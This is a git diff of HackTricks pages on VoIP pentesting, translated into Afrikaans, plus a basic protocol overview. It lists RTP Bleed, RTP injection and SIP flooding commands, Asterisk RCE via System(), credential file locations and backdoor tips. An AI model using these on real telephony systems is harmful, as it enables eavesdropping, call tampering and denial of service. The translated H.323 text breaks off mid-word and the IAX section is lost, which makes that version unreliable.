Therefore **attackers** may **send RTP traffic to the RTP proxy** and receive the proxied RTP traffic meant to be for the caller or callee of an ongoing RTP stream. We call this vulnerability RTP Bleed because it allows attackers to receive RTP media streams meant to be sent to legitimate users. +RTP-proksi's probeer **NAT-beperkings** wat RTC-stelsels affekteer, aanspreek deur RTP-strome tussen twee of meer partye te proksiëer. Wanneer NAT in plek is, kan die RTP-proksi sagteware dikwels nie staatmaak op die RTP-IP- en poortinligting wat deur signalering (bv. SIP) verkry word nie. Daarom het 'n aantal RTP-proksi's 'n meganisme geïmplementeer waar die **IP- en poorttuplet outomaties geleer word**. Dit word dikwels gedoen deur inkomende RTP-verkeer te ondersoek en die bron-IP en -poort vir enige inkomende RTP-verkeer te merk as die een waarop geantwoord moet word. Hierdie meganisme, wat "leermodus" genoem kan word, **maak geen gebruik van enige vorm van verifikasie nie**. Daarom kan **aanvallers** RTP-verkeer na die RTP-proksi stuur en die geproksiëerde RTP-verkeer ontvang wat bedoel is vir die oproeper of ontvanger van 'n aan die gang RTP-stroom. Ons noem hierdie kwesbaarheid RTP Bleed omdat dit aanvallers in staat stel om RTP-media-strome te ontvang wat bedoel is om na wettige gebruikers gestuur te word. -Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints. 
+'n Ander interessante gedrag van RTP-proksi's en RTP-stapel is dat hulle soms, **selfs as hulle nie vatbaar is vir RTP Bleed nie**, RTP-pakette van enige bron sal **aanvaar, deurstuur en/of verwerk**. Daarom kan aanvallers RTP-pakette stuur wat dit vir hulle moontlik maak om hul media in te spuit in plaas van die wettige een. Ons noem hierdie aanval RTP-injectie omdat dit die inspuiting van onwettige RTP-pakette in bestaande RTP-strome moontlik maak. Hierdie kwesbaarheid kan in beide RTP-proksi's en eindpunte gevind word. -Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls. +Asterisk en FreePBX het tradisioneel die **`NAT=yes`-instelling** gebruik, wat RTP-verkeer in staat stel om verifikasie te omseil, wat moontlik lei tot geen klank of eenrigtingklank in oproepe. -For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/) - -* **`rtpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams +Vir meer inligting, besoek [https://www.rtpbleed.com/](https://www.rtpbleed.com/) +* **`rtpbleed.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Dit ontdek die RTP Bleed-kwesbaarheid deur RTP-strome te stuur. ```bash python3 rtpbleed.py -i 10.10.0.10 ``` - -* **`rtcpbleed.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** It detects the RTP Bleed vulnerability sending RTP streams - +* **`rtcpbleed.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Dit ontdek die RTP Bloei kwesbaarheid deur RTP strome te stuur. 
```bash python3 rtcpbleed.py -i 10.10.0.10 ``` - -* **`rtpbleedflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams - +* **`rtpbleedflood.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Exploiteer die RTP Bleed kwesbaarheid deur RTP strome te stuur. ```bash python3 rtpbleedflood.py -i 10.10.0.10 -p 10070 -v ``` - -* **`rtpbleedinject.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Exploit the RTP Bleed vulnerability sending RTP streams (from an audio file) - +* **`rtpbleedinject.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** Exploiteer die RTP Bleed kwesbaarheid deur RTP-strome te stuur (vanuit 'n klanklêer) ```bash python3 rtpbleedinject.py -i 10.10.0.10 -p 10070 -f audio.wav ``` - ### RCE -In Asterisk you somehow manage to be able to **add extension rules and reload them** (for example by compromising a vulnerable web manager server), it's possible to get RCE using the **`System`** command. - +In Asterisk slaag jy op een of ander manier daarin om **uitbreidingsreëls by te voeg en hulle te herlaai** (byvoorbeeld deur 'n kwesbare webbestuurderbediener te kompromitteer), is dit moontlik om RCE te kry deur die **`System`**-opdrag te gebruik. ```scss same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt) ``` - -There is command called **`Shell`** that could be used **instead of `System`** to execute system commands if necessary. +Daar is 'n bevel genaamd **`Shell`** wat gebruik kan word **in plaas van `System`** om stelselopdragte uit te voer indien nodig. {% hint style="warning" %} -If the server is **disallowing the use of certain characters** in the **`System`** command (like in Elastix), check if the web server allows to **create files somehow inside the system** (like in Elastix or trixbox), and use it to **create a backdoor script** and then use **`System`** to **execute** that **script**. 
+As die bediener die gebruik van sekere karakters in die **`System`**-opdrag verbied (soos in Elastix), kyk of die webbediener toelaat om op een of ander manier lêers binne die stelsel te **skep** (soos in Elastix of trixbox), en gebruik dit om 'n agterdeur-skripsie te **skep** en gebruik dan **`System`** om daardie **skripsie** uit te voer. {% endhint %} -#### Interesting local files and permissions +#### Interessante plaaslike lêers en regte -* **`sip.conf`** -> Contains the password of SIP users. -* If the **Asterisk server is running as root**, you could compromise root -* **mysql root user** might **doesn't have any password**. - * this could be used to create a new mysql user as backdoor +* **`sip.conf`** -> Bevat die wagwoord van SIP-gebruikers. +* As die **Asterisk-bedieners as root uitgevoer word**, kan jy root kompromitteer. +* Die **mysql root-gebruiker** het moontlik **geen wagwoord nie**. +* Dit kan gebruik word om 'n nuwe mysql-gebruiker as agterdeur te skep. * **`FreePBX`** - * **`amportal.conf`** -> Contains the password of the web panel administrator (FreePBX) - * **`FreePBX.conf`** -> Constains the password of the user FreePBXuser used to access the database - * this could be used to create a new mysql user as backdoor +* **`amportal.conf`** -> Bevat die wagwoord van die webpaneel-administrateur (FreePBX) +* **`FreePBX.conf`** -> Bevat die wagwoord van die gebruiker FreePBXuser wat gebruik word om toegang tot die databasis te verkry +* Dit kan gebruik word om 'n nuwe mysql-gebruiker as agterdeur te skep. * **`Elastix`** - * **`Elastix.conf`** -> Contains several passwords in clear text like mysql root pass, IMAPd pass, web admin pass -* **Several folders** will belong to the compromised asterisk user (if not running as root). This user can read the previous files and also controls the configuration, so he could make Asterisk to load other backdoored binaries when executed. 
+* **`Elastix.conf`** -> Bevat verskeie wagwoorde in duidelike teks, soos mysql root-wagwoord, IMAPd-wagwoord, web-admin-wagwoord +* **Verskeie lêers** sal aan die gekompromitteerde asterisk-gebruiker behoort (as dit nie as root uitgevoer word nie). Hierdie gebruiker kan die vorige lêers lees en beheer ook die konfigurasie, sodat hy Asterisk kan dwing om ander agterdeur-binêre lêers te laai wanneer dit uitgevoer word. -### RTP Injection +### RTP-injeksie -It's possible to insert a **`.wav`** in converstions using tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`). +Dit is moontlik om 'n **`.wav`** in gesprekke in te voeg deur gebruik te maak van hulpmiddels soos **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) en **`rtpmixsound`** (`sudo apt install rtpmixsound`). -Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) to **scan conversations** (**`rtpscan.pl`**), send a `.wav` to a conversation (**`rtpsend.pl`**) and **insert noise** in a conversation (**`rtpflood.pl`**). +Of jy kan die skripsies van [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) gebruik om gesprekke te **skandeer** (**`rtpscan.pl`**), 'n `.wav` na 'n gesprek te stuur (**`rtpsend.pl`**) en geraas in 'n gesprek in te voeg (**`rtpflood.pl`**). ### DoS -There are several ways to try to achieve DoS in VoIP servers. +Daar is verskeie maniere om DoS in VoIP-bedieners te probeer bereik. 
-* **`sipflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**: **_**SipFlood**_ sends unlimited messages to the target - * `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v` -* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk -* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP. -* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first). -* [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also. -* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks. +* **`sipflood.py`** van [**sippts**](https://github.com/Pepelux/sippts)**: **_**SipFlood**_ stuur onbeperkte boodskappe na die teiken +* `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v` +* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX-protokol wat deur Asterisk gebruik word +* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): 'n Hulpmiddel om SIP/SDP INVITE-boodskappe oor UDP/IP te oorstroming. +* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Stuur verskeie korrek geformuleerde RTP-pakkies. Dit is nodig om die RTP-poorte wat gebruik word, te ken (snuffel eers). +* [**SIPp**](https://github.com/SIPp/sipp): Maak dit moontlik om SIP-verkeer te analiseer en te genereer. Dit kan ook gebruik word vir DoS. +* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP Swiss Army Knife. Kan ook gebruik word vir SIP-aanvalle. * Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper). 
-* **`sipsend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPSend allow us to send a **customized SIP message** and analyze the response. -* **`wssend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** WsSend allow us to send a customized SIP message over WebSockets and analyze the response. +* **`sipsend.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIPSend stel ons in staat om 'n **aangepaste SIP-boodskap** te stuur en die respons te analiseer. +* **`wssend.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** WsSend stel ons in staat om 'n aangepaste SIP-boodskap oor WebSockets te stuur en die respons te analiseer. -### OS Vulnerabilities +### Bedryfstelselkwesbaarhede -The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **not update them again** and **vulnerabilities** are going to be discovered with time. +Die maklikste manier om sagteware soos Asterisk te installeer, is om 'n bedryfstelselverspreiding af te laai wat dit reeds geïnstalleer het, soos: **FreePBX, Elastix, Trixbox**... Die probleem met hierdie verspreidings is dat sodra dit werk, stelseladministrateurs dit dalk **nie weer opdateer nie** en **kwesbaarhede** met tyd ontdek sal word. -## References +## Verwysings * [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki) * [http://blog.pepelux.org/](http://blog.pepelux.org/) @@ -566,14 +508,14 @@ The easiest way to install a software such as Asterisk is to download an **OS di
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index c7bbe127d..3396027f5 100644 --- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -1,24 +1,24 @@ -# Basic VoIP Protocols +# Basiese VoIP-protokolle
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## Signaling Protocols +## Seinprotokolle ### SIP (Session Initiation Protocol) -This is the industry standard, for more information check: +Dit is die bedryfsstandaard, vir meer inligting kyk: {% content-ref url="sip-session-initiation-protocol.md" %} [sip-session-initiation-protocol.md](sip-session-initiation-protocol.md) 
@@ -26,96 +26,81 @@ This is the industry standard, for more information check: ### MGCP (Media Gateway Control Protocol) -MGCP (Media Gateway Control Protocol) is a **signaling** and **call** **control protocol** outlined in RFC 3435. It operates in a centralized architecture, which consists of three main components: +MGCP (Media Gateway Control Protocol) is 'n **sein-** en **oproepbeheerprotokol** wat in RFC 3435 uiteengesit word. Dit werk in 'n gesentraliseerde argitektuur, wat uit drie hoofkomponente bestaan: -1. **Call Agent or Media Gateway Controller (MGC)**: The master gateway in the MGCP architecture is responsible for **managing and controlling the media gateways**. It handles call setup, modification, and termination processes. The MGC communicates with the media gateways using the MGCP protocol. -2. **Media Gateways (MGs) or Slave Gateways**: These devices **convert digital media streams between different networks**, such as traditional circuit-switched telephony and packet-switched IP networks. They are managed by the MGC and execute commands received from it. Media gateways may include functions like transcoding, packetization, and echo cancellation. -3. **Signaling Gateways (SGs)**: These gateways are responsible for **converting signaling messages between different networks**, enabling seamless communication between traditional telephony systems (e.g., SS7) and IP-based networks (e.g., SIP or H.323). Signaling gateways are crucial for interoperability and ensuring that call control information is properly communicated between the different networks. +1. **Oproepagent of Media Gateway Controller (MGC)**: Die meesterpoort in die MGCP-argitektuur is verantwoordelik vir die **bestuur en beheer van die mediapoorte**. Dit hanteer oproepopstelling, wysiging en beëindigingsprosesse. Die MGC kommunikeer met die mediapoorte deur middel van die MGCP-protokol. +2. 
**Mediapoorte (MG's) of Slave-poorte**: Hierdie toestelle **omskakel digitale mediastrome tussen verskillende netwerke**, soos tradisionele skakelstelseltelefonie en pakketskakel-IP-netwerke. Hulle word deur die MGC bestuur en voer opdragte uit wat van dit ontvang is. Mediapoorte kan funksies soos transkodering, pakketisering en egokansellasie insluit. +3. **Seinpoorte (SG's)**: Hierdie poorte is verantwoordelik vir die **omskakeling van seinboodskappe tussen verskillende netwerke**, wat naadlose kommunikasie tussen tradisionele telefoonstelsels (bv. SS7) en IP-gebaseerde netwerke (bv. SIP of H.323) moontlik maak. Seinpoorte is noodsaaklik vir interoperabiliteit en verseker dat oproepbeheerinligting behoorlik tussen die verskillende netwerke gekommunikeer word. -In summary, MGCP centralizes the call control logic in the call agent, which simplifies the management of media and signaling gateways, providing better scalability, reliability, and efficiency in telecommunication networks. +Kortliks, MGCP sentraliseer die oproepbeheerlogika in die oproepagent, wat die bestuur van mediapoorte en seinpoorte vereenvoudig en beter skaalbaarheid, betroubaarheid en doeltreffendheid in telekommunikasienetwerke bied. ### SCCP (Skinny Client Control Protocol) -Skinny Client Control Protocol (SCCP) is a **proprietary signaling and call control protocol** owned by Cisco Systems. It is primarily **used** for communication between **Cisco Unified Communications Manager** (formerly known as CallManager) and Cisco IP phones or other Cisco voice and video endpoints. +Skinny Client Control Protocol (SCCP) is 'n **eiendomsregtelike sein- en oproepbeheerprotokol** wat deur Cisco Systems besit word. Dit word hoofsaaklik **gebruik** vir kommunikasie tussen **Cisco Unified Communications Manager** (voorheen bekend as CallManager) en Cisco IP-telefone of ander Cisco-klank- en videopunte. 
-SCCP is a lightweight protocol that simplifies the communication between the call control server and the endpoint devices. It is referred to as "Skinny" because of its minimalistic design and reduced bandwidth requirements compared to other VoIP protocols like H.323 or SIP. +SCCP is 'n ligte protokol wat die kommunikasie tussen die oproepbeheerbediener en die eindpunttoestelle vereenvoudig. Dit word as "Skinny" verwys vanweë sy minimalistiese ontwerp en verminderde bandwydtevereistes in vergelyking met ander VoIP-protokolle soos H.323 of SIP. -The main components of an SCCP-based system are: +Die belangrikste komponente van 'n SCCP-gebaseerde stelsel is: -1. **Call Control Server**: This server, typically a Cisco Unified Communications Manager, manages the call setup, modification, and termination processes, as well as other telephony features such as call forwarding, call transfer, and call hold. -2. **SCCP Endpoints**: These are devices such as IP phones, video conferencing units, or other Cisco voice and video endpoints that use SCCP to communicate with the call control server. They register with the server, send and receive signaling messages, and follow the instructions provided by the call control server for call handling. -3. **Gateways**: These devices, such as voice gateways or media gateways, are responsible for converting media streams between different networks, like traditional circuit-switched telephony and packet-switched IP networks. They may also include additional functionality, such as transcoding or echo cancellation. +1. **Oproepbeheerbediener**: Hierdie bediener, tipies 'n Cisco Unified Communications Manager, bestuur die oproepopstelling, wysiging en beëindigingsprosesse, sowel as ander telefoniekenmerke soos oproepstuur, oproepoordrag en oproephou. +2. **SCCP-eindpunte**: Dit is toestelle soos IP-telefone, videovergaderingseenhede of ander Cisco-klank- en videopunte wat SCCP gebruik om met die oproepbeheerbediener te kommunikeer. 
Hulle registreer by die bediener, stuur en ontvang seinboodskappe, en volg die instruksies wat deur die oproepbeheerbediener vir oproephantering verskaf word. +3. **Poorte**: Hierdie toestelle, soos klankpoorte of mediapoorte, is verantwoordelik vir die omskakeling van mediastrome tussen verskillende netwerke, soos tradisionele skakelstelseltelefonie en pakketskakel-IP-netwerke. Hulle kan ook bykomende funksionaliteit insluit, soos transkodering of egokansellasie. -SCCP offers a simple and efficient communication method between Cisco call control servers and endpoint devices. However, it is worth noting that **SCCP is a proprietary protocol**, which can limit interoperability with non-Cisco systems. In such cases, other standard VoIP protocols like SIP may be more suitable. +SCCP bied 'n eenvoudige en doeltreffende kommunikasiemetode tussen Cisco-ooproepbeheerbedieners en eindpunttoestelle. Dit is egter die moeite werd om op te let dat **SCCP 'n eiendomsregtelike protokol** is, wat die interoperabiliteit met nie-Cisco-stelsels kan beperk. In sulke gevalle kan ander standaard VoIP-protokolle soos SIP meer geskik wees. ### H.323 -H.323 is a **suite of protocols** for multimedia communication, including voice, video, and data conferencing over packet-switched networks, such as IP-based networks. It was developed by the **International Telecommunication Union** (ITU-T) and provides a comprehensive framework for managing multimedia communication sessions. +H.323 is 'n **reeks protokolle** vir multimedia kommunikasie, insluitend klank, video en datakonferensies oor pakketskakelnetwerke, soos IP-gebaseerde netwerke. Dit is ontwikkel deur die **International Telecommunication Union** (ITU-T) en bied 'n omvattende raamwerk vir die bestuur van multimedia kommunikasiesessies. -Some key components of the H.323 suite include: +Sommige sleutelkomponente van die H.323-reeks sluit in: -1. 
**Terminals**: These are endpoint devices, such as IP phones, video conferencing systems, or software applications, that support H.323 and can participate in multimedia communication sessions. -2. **Gateways**: These devices convert media streams between different networks, like traditional circuit-switched telephony and packet-switched IP networks, enabling interoperability between H.323 and other communication systems. They may also include additional functionality, such as transcoding or echo cancellation. -3. **Gatekeepers**: These are optional components that provide call control and management services in an H.323 network. They perform functions such as address translation, bandwidth management, and admission control, helping to manage and optimize network resources. -4. **Multipoint Control Units (MCUs)**: These devices facilitate multipoint conferences by managing and mixing media streams from multiple endpoints. MCUs enable features such as video layout control, voice-activated switching, and continuous presence, making it possible to host large-scale conferences with multiple participants. +1. **Terminale**: Dit is eindpunttoestelle, soos IP-telefone, videovergaderingstelsels of sagtewaretoepassings, wat H.323 ondersteun en kan deelneem aan multimedia kommunikasiesessies. +2. **Poorte**: Hierdie toestelle omskakel mediastrome tussen verskillende netwerke, soos tradisionele skakelstelseltelefonie en pakketskakel-IP-netwerke, en maak interoperabiliteit tussen H.323 en ander kommunikasiestelsels moontlik. Hulle kan ook bykomende funksionaliteit insluit, soos transkodering of egokansellasie. +3. **Poortbeheerders**: Dit is opsionele komponente wat oproepbeheer- en bestuursdienste in 'n H.323-netwerk voorsien. Hulle voer funksies uit soos adresvertaling, bandwydtebestuur en toelatingsbeheer, wat help om netwerkbronne te bestuur en te optimaliseer. +4. 
**Multipuntbeheereenhede (MCUs)**: Hierdie toestelle fasiliteer multipunt-konferensies deur mediastrome vanaf verskeie eindpunte te bestuur en te meng. MCUs maak funksies soos video-uitlegbeheer, stemgeaktiveerde skakeling en voortdurende teenwoordigheid moontlik, wat dit moontlik maak om grootskaalse konferensies met verskeie deelnemers aan te bied. -H.323 supports a range of audio and video codecs, as well as other supplementary services like call forwarding, call transfer, call hold, and call waiting. Despite its widespread adoption in the early days of VoIP, H.323 has been gradually replaced by more modern and flexible protocols like the **Session Initiation Protocol (SIP)**, which offers better interoperability and easier implementation. However, H.323 remains in use in many legacy systems and continues to be supported by various equipment vendors. +H.323 ondersteun 'n verskeidenheid klank- en videokodeks, sowel as ander aanvullende dienste soos oproepstuur, o +## Oordrag- en Vervoerprotokolle -### IAX (Inter Asterisk eXchange) +### SDP (Sessiebeskrywingsprotokol) -IAX (Inter-Asterisk eXchange) is a **signaling and call control protocol** primarily used for communication between Asterisk PBX (Private Branch Exchange) servers and other VoIP devices. It was developed by Mark Spencer, the creator of the Asterisk open-source PBX software, as an alternative to other VoIP protocols like SIP and H.323. +SDP (Sessiebeskrywingsprotokol) is 'n **teksgebaseerde formaat** wat gebruik word om die kenmerke van multimedia-sessies, soos spraak, video of datakonferensies, oor IP-netwerke te beskryf. Dit is ontwikkel deur die **Internet Engineering Task Force (IETF)** en word gedefinieer in **RFC 4566**. SDP hanteer nie die werklike media-oordrag of sessie-opstelling nie, maar word saam met ander seinprotokolle, soos **SIP (Sessie-inisiasieprotokol)**, gebruik om te onderhandel en inligting oor die media-strome en hul eienskappe uit te ruil. 
-IAX is known for its **simplicity, efficiency, and ease of implementation**. Some key features of IAX include: +Sommige sleutellemente van SDP sluit in: -1. **Single UDP Port**: IAX uses a single UDP port (4569) for both signaling and media traffic, which simplifies firewall and NAT traversal, making it easier to deploy in various network environments. -2. **Binary Protocol**: Unlike text-based protocols like SIP, IAX is a binary protocol, which reduces its bandwidth consumption and makes it more efficient for transmitting signaling and media data. -3. **Trunking**: IAX supports trunking, which allows multiple calls to be combined into a single network connection, reducing overhead and improving bandwidth utilization. -4. **Native Encryption**: IAX has built-in support for encryption, using methods like RSA for key exchange and AES for media encryption, providing secure communication between endpoints. -5. **Peer-to-Peer Communication**: IAX can be used for direct communication between endpoints without the need for a central server, enabling simpler and more efficient call routing. +1. **Sessie-inligting**: SDP beskryf die besonderhede van 'n multimedia-sessie, insluitend sessienaam, sessiebeskrywing, begin- en eindtyd. +2. **Media-strome**: SDP definieer die eienskappe van media-strome, soos die media-tipe (klank, video of teks), vervoerprotokol (bv. RTP of SRTP) en die media-formaat (bv. kodekinligting). +3. **Verbindingsinligting**: SDP verskaf inligting oor die netwerkadres (IP-adres) en poortnommer waar die media gestuur of ontvang moet word. +4. **Eienskappe**: SDP ondersteun die gebruik van eienskappe om addisionele, opsionele inligting oor 'n sessie of media-stroom te verskaf. Eienskappe kan gebruik word om verskillende kenmerke soos enkripsiesleutels, bandwydtevereistes of media-beheermeganismes te spesifiseer. 
-Despite its benefits, IAX has some limitations, such as its primary focus on the Asterisk ecosystem and less widespread adoption compared to more established protocols like SIP. As a result, IAX might not be the best choice for interoperability with non-Asterisk systems or devices. However, for those working within the Asterisk environment, IAX offers a robust and efficient solution for VoIP communication. +SDP word tipies gebruik in die volgende proses: -## Transmission & Transport Protocols +1. 'n Inisieerende party skep 'n SDP-beskrywing van die voorgestelde multimedia-sessie, insluitend die besonderhede van die media-strome en hul eienskappe. +2. Die SDP-beskrywing word na die ontvangende party gestuur, gewoonlik ingebed binne 'n seinprotokolboodskap soos SIP of RTSP. +3. Die ontvangende party verwerk die SDP-beskrywing en, gebaseer op sy vermoëns, kan dit die voorgestelde sessie aanvaar, verwerp of wysig. +4. Die finale SDP-beskrywing word as deel van die seinprotokolboodskap teruggestuur na die inisieerende party, wat die onderhandelingsproses voltooi. -### SDP (Session Description Protocol) - -SDP (Session Description Protocol) is a **text-based format** used to describe the characteristics of multimedia sessions, such as voice, video, or data conferencing, over IP networks. It was developed by the **Internet Engineering Task Force (IETF)** and is defined in **RFC 4566**. SDP does not handle the actual media transmission or session establishment but is used in conjunction with other signaling protocols, like **SIP (Session Initiation Protocol)**, to negotiate and exchange information about the media streams and their attributes. - -Some key elements of SDP include: - -1. **Session Information**: SDP describes the details of a multimedia session, including session name, session description, start time, and end time. -2. 
**Media Streams**: SDP defines the characteristics of media streams, such as the media type (audio, video, or text), transport protocol (e.g., RTP or SRTP), and the media format (e.g., codec information). -3. **Connection Information**: SDP provides information about the network address (IP address) and port number where the media should be sent or received. -4. **Attributes**: SDP supports the use of attributes to provide additional, optional information about a session or media stream. Attributes can be used for specifying various features like encryption keys, bandwidth requirements, or media control mechanisms. - -SDP is typically used in the following process: - -1. An initiating party creates an SDP description of the proposed multimedia session, including the details of the media streams and their attributes. -2. The SDP description is sent to the receiving party, usually embedded within a signaling protocol message like SIP or RTSP. -3. The receiving party processes the SDP description, and based on its capabilities, it may accept, reject, or modify the proposed session. -4. The final SDP description is sent back to the initiating party as part of the signaling protocol message, completing the negotiation process. - -SDP's simplicity and flexibility make it a widely adopted standard for describing multimedia sessions in various communication systems, playing a crucial role in establishing and managing real-time multimedia sessions over IP networks. +SDP se eenvoud en buigsaamheid maak dit 'n wyd aangeneemde standaard vir die beskrywing van multimedia-sessies in verskillende kommunikasiestelsels, en speel 'n belangrike rol in die vestiging en bestuur van regstreekse multimedia-sessies oor IP-netwerke. ### RTP / RTCP / SRTP / ZRTP -1. **RTP (Real-time Transport Protocol)**: RTP is a network protocol designed for the delivery of audio and video data, or other real-time media, over IP networks. 
Developed by the **IETF** and defined in **RFC 3550**, RTP is commonly used with signaling protocols like SIP and H.323 to enable multimedia communication. RTP provides mechanisms for **synchronization**, **sequencing**, and **timestamping** of media streams, helping to ensure smooth and timely media playback. -2. **RTCP (Real-time Transport Control Protocol)**: RTCP is a companion protocol to RTP, used for monitoring the quality of service (QoS) and providing feedback on the transmission of media streams. Defined in the same **RFC 3550** as RTP, RTCP **periodically exchanges control packets between participants in an RTP session**. It shares information such as packet loss, jitter, and round-trip time, which helps in diagnosing and adapting to network conditions, improving overall media quality. -3. **SRTP (Secure Real-time Transport Protocol)**: SRTP is an extension of RTP that provides **encryption**, **message authentication**, and **replay protection** for media streams, ensuring secure transmission of sensitive audio and video data. Defined in **RFC 3711**, SRTP uses cryptographic algorithms like AES for encryption and HMAC-SHA1 for message authentication. SRTP is often used in combination with secure signaling protocols like SIP over TLS to provide end-to-end security in multimedia communication. -4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP is a cryptographic key-agreement protocol that provides **end-to-end encryption** for RTP media streams. Developed by Phil Zimmermann, the creator of PGP, ZRTP is described in **RFC 6189**. Unlike SRTP, which relies on signaling 